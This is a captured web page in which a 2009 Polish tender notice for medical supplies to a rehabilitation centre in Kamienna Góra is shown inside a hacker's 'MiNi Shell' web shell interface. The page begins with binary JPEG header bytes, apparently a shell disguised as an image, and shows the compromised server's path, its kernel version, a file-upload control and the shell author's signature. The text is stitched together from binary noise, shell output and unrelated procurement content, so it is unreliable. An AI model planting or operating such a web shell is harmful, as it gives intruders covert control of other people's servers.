JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090206/34669-N-2009.html

<p class="kh_header"><b>Kamienna Góra: Dostawa drobnego sprzętu medycznego dla Dolnośląskiego Centrum  Rehabilitacji w Kamiennej Górze</b><br>
<b>Numer ogłoszenia: 34669 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Rehabilitacji Sp. z o.o. , ul. Korczaka 1, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7462570, faks 075 7462577.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dcrnzoz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa drobnego sprzętu medycznego dla Dolnośląskiego Centrum  Rehabilitacji w Kamiennej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu medycznego do Dolnośląskiego Centrum Rehabilitacji Sp. z o.o. w Kamiennej Górze.
Przedmiot zamówienia podzielony został  na siedem grup, stanowiących odrębne części (pakiety) zamówienia. Szczegółowe zestawienie asortymentowe zamawianego sprzętu medycznego i jego szacunkowe ilości określono w załącznikach. 

Oferowany sprzęt musi być wprowadzony do obrotu i używania zgodnie z Ustawą z dnia 20 kwietnia 2004 roku o wyrobach medycznych (Dz.U. z 2004 Nr 93 poz. 896 z późn. zm.). Wykonawca zobowiązany jest posiadać wymagane przepisami dokumenty potwierdzające wprowadzenie oferowanego sprzętu do obrotu i używania i zobowiązany jest okazać te dokumenty Zamawiającemu na każde jego żądanie. 
Zamawiający na bazie doświadczeń z lat ubiegłych oszacował zapotrzebowanie na sprzęt medyczny na okres 12 miesięcy. Ilości te (podane w załącznikach ) stanowią wartość szacunkową, co oznacza, że ostateczna ilość sprzętu zamawiana na podstawie umowy może ulec zmianie. 
Miejscem dostawy jest Dolnośląskie Centrum Rehabilitacji Sp. z o.o. w Kamiennej Górze z siedzibą przy ul. J. Korczaka 1, Pawilon II,  Apteka Zakładowa - parter.
Zamawiający będzie składał zamówienia w miarę potrzeb, telefonicznie lub faksem. Oczekiwany czas na realizację dostawy wynosi 5 dni od złożenia zamówienia (dotyczy dni roboczych). Za dni robocze zamawiający przyjmuje dni od poniedziałku do piątku z wyłączeniem świąt.
Dostarczony sprzęt musi posiadać minimum 24-miesięczną gwarancję, licząc od daty jego otrzymania przez Zamawiającego. 
W przypadku wykrycia wad zamówionego sprzętu lub jego niezgodności asortymentowej i ilościowej ze złożonym zamówieniem, Zamawiający niezwłocznie powiadomi o tym fakcie Wykonawcę i prześle mu protokół opisujący stwierdzone nieprawidłowości. W przypadku złożenia uzasadnionej reklamacji, Wykonawca zobowiązany jest wymienić niezwłocznie i na własny koszt towar wadliwy na wolny od wad i/lub dostarczyć (uzupełnić) asortyment i ilości zgodnie z zamówieniem.
Wykonawca na żądanie Zamawiającego zobowiązany jest pisemnie potwierdzić fakt  przyjęcia reklamacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.  Posiadają uprawnienia do wykonywania działalności lub czynności.
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali należycie co najmniej dwie dostawy sprzętu medycznego o wartości brutto minimum 10.000 zł. każda.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
4.  Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków Wykonawcy zobowiązani są do przedstawienia w ofercie następujących oświadczeń i dokumentów:
1.  Podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu - wzór: Dokument 1 oraz stosownie do sytuacji Wykonawcy : Dokument 2A lub Dokument 2B.
2.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3. Wykaz zrealizowanych dostaw sprzętu medycznego w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości minimum 10.000 zł. brutto. Wykaz powinien zawierać następujące dane: przedmiot zamówienia, wartość brutto dostaw, daty realizacji i nazwy odbiorców.
4.  Dokumenty potwierdzające, że dostawy określone w pkt 3 zostały wykonane należycie.
5. Polisa, a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dcrnzoz.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Rehabilitacji Sp. z o.o. przy ul. J. Korczaka 1, Pawilon I (parter).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 11:00, miejsce: Dolnośląskie Centrum Rehabilitacji Sp. z o.o. przy ul. J. Korczaka 1, Pawilon I, sekretariat (parter),.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do znieczulenia zewnątrz oponowego-rozszerzony
	elementy: igła Tuohy, kateter epioluralny dł. 100 cm, filtr p/bakteryjny płaski 0,2 um, strzykawka niskooporowa 10 ml, strzykawka 10 ml, grot do nacinania skóry, igła do podawania leków 0,9 x 40 mm, igła do znieczuleń 0,5 x 25 mm
	18 G / 80 mm	szt.	10
	19 G / 50 mm	szt.	25
2	Zestaw do znieczulenia kombinowanego (podpajęczynówkowo-zewnątrzoponowy rozszerzony
	elementy: igła Tuohy, igla p/paj.26 G, cewnik epioluralny, filtr p/bakteryjny, płaski 0,2 mm, strzykawka niskooporowa 10 mm, grot do nacinania skóry, igła do podawania leków 0,9 x 40 mm, igła do znieczuleń 0,5 x 25 mm
	18 G / igła 26 G / 130 mm	szt.	25
3	Zestaw do znieczuleia kombinowanego podpajęczyn.-zewnątrz opon.mały
	elementy: igła Tuohy, igła podpajęczyn. 26 G
	18 G / igła 26 G / 130 mm	szt.	20
4	Zestaw do analgezji ran pooperacyjnych
	elementy: kateter epiduralny 16 G-19 G z nasadką (otwory 5a 15 cm), filtr p/bakteryjny 0,2 um		
	18 G / 90 cm	szt.	30
	19 G / 90 cm	szt.	30
5	Zestaw do znieczulenia podpajęczynówkowego z igłą Pencil - Point
	elementy: igła 24 G-27G Pencil - Point (ostrze whitacre), igła prowadząca 20G-22G, igła do znieczuleń 0,5 x 25 mm, igła do podawania leków 0,9 x 40 mm, strzykawki 2,5ml, 5ml
	25 G - 20 G (igła PP 25G)	szt.	25
	26 G - 20 G (igła PP 26G)	szt.	25
	27 G - 22 G (igła PP 27G)	szt.	25
6	Igła do znieczulenia typ Pencil-Point
	25 G / 90 mm	szt.	30
	26 G / 90 mm	szt.	1200
	27 G / 90 mm	szt.	50
7	Igła do znieczulenia podpajęczynówkowego STANDARD
	22 G / 90 mm	szt.	100
	26 G / 130 mm	szt.	50
	27 G / 90 mm	szt.	50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dren do odsysania typu Redon
1	F 8/50 cm	szt.	150
2	F10/70 cm	szt.	1000
3	F12/70 cm	szt.	1000
4	F14/70 cm	szt.	500
5	F16/70 cm	szt.	800
Dren do odsysania pola operacyjnego
6	Typ A z dwoma rozszerzeniami 5,0 x 3,4 / 3000 mm	szt.	1500
7	Typ B z dwoma rozszerzeniami 9,0 x 6,6 / 3000 mm	szt.	1000
Końcówka do odsysania pola operacyjnego, typ G-Yankauera ze zgiętą końcówką (6,0 x 4,5/250)
8	rozmiar 18	szt.	100
9	rozmiar 22	szt.	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szczotka do rąk wielorazowego użytku Super Brush	szt.	40
2	Kranik trójdrożny	szt.	400
3	Przyrząd do szybkiego przetaczania krwi	szt.	10
4	Cewnik Nelaton CH 10-20	szt.	600
5	Cewnik Foley Ch 8 silikonowany 1x użytku	szt.	20
6	Cewnik Foley CH 10 silikonowany 1x użytku	szt.	30
7	Cewnik Foley CH 12-24 silikonowany 1x użytku	szt.	1800
8	Kieliszki do leków szklane	szt.	100
9	Kieliszki do leków plastikowe (1 op. = 70 szt.)	op.	100
10	Elektroda EKG z żelem - dla dorosłych	szt.	7800
11	Elektroda EKG z żelem - dla dzieci	szt.	300
12	Basen sanitarny plastik	szt.	50
13	Cewnik do podawania tlenu przez nos	szt.	1200
14	Szczotka do chirurgicznego mycia rąk - jednorazowa, nasączona 4% glukomianem chlorheksydyny - sterylna	szt.	1000
15	Pinceta medyczna jednorazowego użytku	szt.	700
16	Kaczka sanitarna plastik z przymocowaną przykrywką	op	80
Filtr antybakteryjny oddechowy mechaniczny
17	- dla dorosłych	szt.	300
18	- dla dzieci	op	50
Igły jednorazowego użytku (op. = 100 szt.):
19	0,45 x 16	op	10
20	0,40 x 20	op	10
21	0,50 x 25	op	60
22	0,60 x 32	op	10
23	0,70 x 30	op	60
24	0,80 x 40	op	300
25	0,90 x 40	op	50
26	1,20 x 40	op	400
Pojemnik na zużyte igły i odpady szpitalne
27	0,7 L	szt.	700
28	2,0 L	szt.	400
29	10 L	szt.	300
30	Worek do zbiórki moczu 2000 ml z zastawką antyrefleksyjną, skalowany co 50 ml	szt.	1000
Strzykawki jednorazowego użytku:
31	2 ml 	szt.	7000
32	5 ml 	szt.	15000
33	10 ml 	szt.	30000
34	20 ml 	szt.	6000
35	50 ml do pomp infuzyjnych	szt.	400
36	100 ml t. Janet	szt.	200
37	1 ml z igłą 0,4 x 13 - do insuliny	szt.	400.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Test paskowy para w. Comply 1251 x 480 	opak.	30
2	Test paskowy para w. Comply 1250 x 480 	opak.	80
3	Test biologiczny Attest para w. 1262 (1 op. = 10 szt.)	opak.	10
4	Test biologiczny Attest tlenek etylenu 1264	opak.	6
5	taśma wskaźnikowa z indykatorem 19x 50 para wodna	szt.	300
6	Papier do sterylizacji 120 x 120 zielony (1 op. = 100 szt.)	opak.	20
7	papier do sterylizacji 90 x 90 zielony (1 op. = 100 szt.)	opak.	60
8	Papier termoczuły 110 x 30	rolka	15
9	Papier termoczuły 38 x 30	rolka	40
10	Papier termoczuły 57 x 30	rolka	30
11	Rurki intubacyjne zbrojone z mankietem 4,0 - 9,5	szt.	150
12	Rurki intubacyjne z mankietem niskociśnieniowym 3,0 - 9,5	szt.	300
13	Rurki intubacyjne 3,0 - 9,5	szt.	100
14	Rurki Guedel 000-3	szt.	30
Butelka do długotrwałego odsysania ran
15	Typu Redon 200 ml	szt.	7000
16	Typu Redon 400 ml	szt.	2000
17	Typu Redon 400 ml z końcówką do połączenia z drenem nr18	szt.	500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Skalpel 1 x użytku nr 11 (1 op. = 10 szt.)	op.	50
2	Skalpel 1 x użytku nr 15 (1 op. = 10 szt.)	op	50
3	Skalpel 1 x użytku nr 22 (1 op. = 10 szt.)	op	50
4	Ostrze chirurgiczne nr 10 , 15 , 20 , 21 , 22 (1 op. = 100 szt.)	op	100
5	Przedłużacz do pompy infuzyjnej 150 cm bursztynowy	szt.	200
6	Przedłużacz do pompy infuzyjnej 20 cm	szt.	100
7	Pojnik dla chorych	szt.	100
8	Maska tlenowa dla dorosłych + dren	szt.	100
9	Maska tlenowa dla dzieci + dren	szt.	40
10	Kaniula dożylna typu Motylek 0,5 x 19mm-25G	szt.	150
11	Fartuch foliowy biały (1 op. = 100 szt.)	op	40
12	Rękawice foliowe damskie (1 op. = 100 szt.)	op	1500
13	Termometr lekarski - w etui	szt.	300
14	Szyna aluminiowa palcowa Zimmera 460 x 18 (450 x 20 )	szt.	100
15	Miska nerkowa 20 cm	szt.	20
16	Miska nerkowa 28 cm	szt.	40
17	Przyrząd do przetaczania płynów infuzyjnych	szt.	3000
18	Przyrząd do przetaczania krwi	szt.	1000
19	Palnik bakt. TUV-30	szt.	10
20	Wanienka do dezynfekcji narzędzi plastikowa 5 l	szt.	3
21	Wanienka do dezynfekcji narzędzi plastikowa 10 l	szt.	3
22	Żarówka bezcieniowa 24 V	szt.	30
23	Zestaw do lewatywy niesterylny worek z wężem zakończony miękką kanką z jednym otworem i otworami bocznymi	szt.	1000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do połączonego znieczulenia podpajęczynówkowego zewnątrzoponowego z systemem blokowania igły p.p. w igle z.o.	szt.	10
2	Igła do znieczuleń podpajęczynówkowych pediatryczna typu pencil point 27 G dł 50 mm	szt.	25
3	Igła do znieczuleń zewnątrzoponowych pediatryczna 22 G dł 50 mm	szt.	50
4	Zestaw do znieczuleń zewnątrzoponowych pediatryczny (cewnik z.o. G 24, igła do znieczuleń z.o. 20 G x 50 mm, filtr z.o., strzykawka niskooporowa, łącznik)	szt.	20
5	Zestaw do ciąłego znieczulenia podpajęczynówkowego (cewnik p.p. 24 G x 28, igła pp 29 G, igła epiduralna G 18, strzykawka niskooporowa, filtr z.o., łącznik)	szt.	50
6	Igła Stimuplex 24 G - 25 mm	szt.	200
7	Łącznik FINGERTIP	szt.	100
8	Combifix-adapter REKORD-Luer (4090306)	szt.	200
9	Aparat do pobierania i przygotowywania leków z filtrem przeciwbakteryjnym z zamknięciem dwu-zatrzaskowym	szt.	100
10	Zatyczka do cewników	szt.	200
Igła do znieczuleń zewnątrzoponowych
11	ATRAUCAN (4504739) - 0,47 x 88 mm/26G x 3,1/2	szt.	20
12	ATRAUCAN 0,90 x 35 mm/20G x 1,3/8	szt.	20
13	EPICAN PAED (4502400) - 30 mm x 0,53/25G x 1,1/8	szt.	30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kaniula dożylna z portem z poliuretanu z czterema paskami kontrastującymi pod RTG, kształt końca kaniuli i igły z tylnym szlifem celem łatwiejszego wprowadzenia, samozamykający się port, informacja o prędkości przepływu na opakowaniu jednostkowym, membrana hydrofobowa chroniąca przed wypływem krwi po zakłuciu:

1	0,7 - 24G	szt.	100
2	0,9 - 22G	szt.	1800
3	1,1 - 20G	szt.	1800
4	1,3 - 18G	szt.	1200
5	1,5 - 17G	szt.	500
6	1,7 - 16G	szt.	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com